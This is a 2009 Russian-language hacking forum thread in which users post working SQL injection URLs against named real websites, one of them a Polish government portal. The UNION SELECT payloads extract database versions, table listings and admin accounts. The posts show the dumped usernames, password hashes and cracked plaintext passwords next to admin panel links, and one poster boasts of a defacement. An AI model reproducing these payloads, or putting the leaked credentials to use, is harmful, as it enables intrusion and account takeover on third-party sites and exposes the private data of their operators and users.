14.02.2009, 15:06
|
|
Познающий
Регистрация: 28.08.2008
Сообщений: 39
С нами:
9316980
Репутация:
12
|
|
www.rune-soft.com
PR = 4
Код:
http://www.rune-soft.com/product.php?product_id=-102%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(login,0x3a,password,0x3a,email),20,21,22,23+from+user+limit+2,1/*
login:password:email
admin:tagltorp:ivang@mail.com
Код:
http://www.rune-soft.com/product.php?product_id=-102%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(version(),0x3a,database(),0x3a,user()),20,21,22,23/*
версия:бд:юзер
5.0.32-Debian_7etch8:runeDB:runeDBuser@localhost
|
|
|
14.02.2009, 15:58
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://cms.artmedia.ee/arinou/index.php?leht=149'+union+select+version(),2/*
Версия: 4.1.22-standard
Имя бд: wartmed_walmivad
Юзер: wartmed_wartmed@localhost
Таблицы не подобрал)
http://www.tartu.ee/arinouandla/index.php?leht=219'+union+select+version(),2
Пятая версия.
В бд ничего нету интересного,можете сами проверить таблицы:
kasutajad,kasutajad_back,kasutajad_190607,umail
|
|
|
|
15.02.2009, 12:47
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Код:
http://www.ruscable.ru/board_el/msg-55533+union+select+1,2,3,4,concat_ws(0x15,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16.html
|
|
|
|
14.02.2009, 16:00
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами:
9116712
Репутация:
688
|
|
Код:
http://www.zavraca.com/news.php?topic=11&id=-1+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10--
Database Version : 5.0.32-Debian_7etch4-log
Database name : vraca
User name : vraca@www2.host2bg.com
берем юзверей:
Код:
http://www.zavraca.com/news.php?topic=11&id=-1+union+select+1,concat _ws(0x3a,username,user_password),3,4,5,6,7,8,9,10+from+phpbb _users+limit+1,1--
их ~ 1700 |
|
|
|
15.02.2009, 10:38
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://www.administratordebloc.ro/index.php?action=article&ID=-17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws( 0x3a,version(),database(),user()),13--
Database Version: 5.0.67-community
Database name: admbl_admbl
User name: admbl@localhost
http://www.administratordebloc.ro/admin
|
|
|
|
15.02.2009, 12:08
|
|
Познающий
Регистрация: 28.08.2008
Сообщений: 39
С нами:
9316980
Репутация:
12
|
|
www.whitestrip.ru
Google PR: 5
Yandex CY:130
Код:
http://www.whitestrip.ru/news/view/896+union+select+1,2,concat(version(),0x3a,database(),user()),4,5,6,7,8,9/*/
Версия: 5.0.67
Юзер: u15581@78.108.81.41
Бд: b15581_wstrip
Код:
http://www.whitestrip.ru/news/view/896+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*/
Вывод всех табличек
Код:
http://www.whitestrip.ru/news/view/896+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.columns/*/
Вывод всех колонок
Также смотрим на мой мини дефейс)))
www.whitestrip.ru
http://www.whitestrip.ru/pages/dimionx/
|
|
|
|
15.02.2009, 13:18
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
http://infobase.paiz.gov.pl/indexl.php?action=select_nieruch_id&id=77170948098 0+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a ,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71) ,0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32-- &offset=380&zones_id=&voivodship=&area_min=&area_m ax=
Database Version: 5.0.18-standard
Database name: infobase3
User name: www-data@localhost
http://infobase.paiz.gov.pl/indexl.php?action=select_nieruch_id&id=77170948098 0+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a ,password,0x3a,User,0x3a),0x71),0x71),2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32+from+mysql.user+limit+0,1--
: 054bea7647c4c9ff : root :
: 027a5ebb761cd005 : mrozek :
: 26978fd16e5c7f8b : www-data :
http://playak.com/kayaks.php?id=587614566876870+union+select+1,2,3,c oncat_ws(0x3a,version(),user(),database()),5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34--
5.0.22-log
playak@localhost
playak rating
http://playak.com/kayaks.php?id=587614566876870+union+select+1,2,3,c oncat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34+from+mysql.user+limit+0,1--
admin:6633c79b2fec1807
pma_aqBG7oMhnKtq:4156e69767be6e91
horde:0e843dda46926377
netpresent:250dbe034105d511
seag:2c07485714a923e2
terrag:765d8db733d31334
rosenberg:1a501a431e40f89f
airsquad:59811f9f5eaf68c3
playak:250dbe034105d511
polls:107b804a16be8687
boatinfo:02f0fcf80f7b4bbc
mambo:70f7ce324f035014
nookie:2aa80ddd11d25b68
fish:4b7be07c38ffcf32
mambo451a:31faef2201fc5b68
kajakvideos:250dbe034105d511
adrian:4bece1e04447a9c9
sugar5:250dbe034105d511
Последний раз редактировалось jokester; 15.02.2009 в 13:51..
Причина: gamershood.com БОЯН
|
|
|
|
15.02.2009, 13:46
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
С нами:
9314306
Репутация:
325
|
|
upitup.com - PR5
Код:
http://www.upitup.com/roster/artist.php?aid=1000+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8/*
DB_Ver:4.0.27-standard-log
DB_User:Sql18862@62.149.141.95
DB:Sql18862_1
Таблица с пользователями называется User, интересные поля id,email,username,password
Вытаскиваем одного из админов:
Код:
http://www.upitup.com/roster/artist.php?aid=1000+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),73),73),3,4,5,6,7,8+from+users+limit+1,1/*
admin:3a21adafbcd3d31a17da15c670615005
или уже расшифрованные
admin : p161c4u
Чтобы попасть в админку логинимся и переходим:
Код:
http://www.upitup.com/controlcenter/
|
|
|
|
15.02.2009, 14:43
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами:
9116712
Репутация:
688
|
|
Код:
http://www.ultimabg.com/news.php?lang=en&valuta=&id=-1+union+select+concat_ ws(0x3a,version(), database(),user()),2,3,4,5,6--
Database Version : 5.0.67-msl-usrs-icd1-log
Database name : ultimabg_estatemanager
User name : nkemutf5@localhost
----------------------------------------------------#
Код:
http://www.property-bourgas.com/news.php?id=-1+union+select+1,concat_ ws(0x3a, version(),database(),user()),3,4,5,6--
Database Version : 5.0.67-log
Database name : bourgas
User name : bourgas@localhost
берем админов:
Код:
http://www.property-bourgas.com/news.php?id=-1+union+select+1,concat _ws( 0x3a,id,users,passes),3,4,5,6+from+aeg_accounts+limit+0,1--
1:volid:551278
2:admin:aeg1234
----------------------------------------------------#
Код:
http://www.traditzia.bg/bg/news.php?Id=-1'
инфу о бд не даёт просмотреть ... но за-то смотрим админов:
Код:
http://www.traditzia.bg/bg/news.php?Id=-1+union+select+1,concat _ws(0x3a,id,user,pass),3,4,5,6,7+from+ users+limit+0,1--
1:admin:$tradicija
2:tradicia:4tradici@
а тут сама админка:
Код:
http://www.traditzia.bg/ admin/
Последний раз редактировалось f1ng3r; 15.02.2009 в 15:27..
|
|
|
|
15.02.2009, 15:52
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://www.unarte.ro/unarte/newunarteTST/home.php?l=ro&p=noutati&id=-37+UNION+SELECT+CONCAT_WS(0x3a,version(),database( ),user()),2,3,4
Version : 5.0.67-community
Database : unarte_tetenica
User : unarte_siteuna@localhost
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
